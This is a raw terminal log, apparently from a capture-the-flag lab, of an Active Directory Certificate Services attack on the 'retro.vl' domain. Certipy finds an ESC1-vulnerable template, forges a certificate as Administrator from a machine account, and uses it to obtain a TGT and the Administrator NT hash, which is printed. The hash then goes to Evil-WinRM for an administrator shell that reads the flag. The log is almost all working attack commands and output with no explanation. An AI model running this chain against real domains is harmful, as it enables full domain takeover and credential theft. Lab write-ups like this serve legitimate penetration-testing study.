ADCS 10.129.77.181 389 DC Found CN: retro-DC-CAcertipy find -u 'banking$' -p password -dc-ip 10.129.77.181 -vulnerable -stdoutCertipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.certipy -debug req -u 'banking$' -p password -dc-ip 10.129.77.181 -ca retro-DC-CA -template RetroClients -upn Administrator -target dc.retro.vl -key-size 4096 -sid S-1-5-21-2983547755-698260136-4283918172-500Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.77.181'
[+] DC IP: '10.129.77.181'
[+] DC Host: None
[+] Target IP: None
[+] Remote Name: 'dc.retro.vl'
[+] Domain: ''
[+] Username: 'BANKING$'
[+] Trying to resolve 'dc.retro.vl' at '10.129.77.181'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.77.181[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.77.181[\pipe\cert]
[*] Request ID is 11
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[+] Found SID in SAN URL: 'S-1-5-21-2983547755-698260136-4283918172-500'
[+] Found SID in security extension: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.129.77.181Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389evil-winrm -i 10.129.77.181 -u 'administrator' -H 252fac7066d93dd009d4fd2cd0368389 Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/8/2025 8:11 PM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt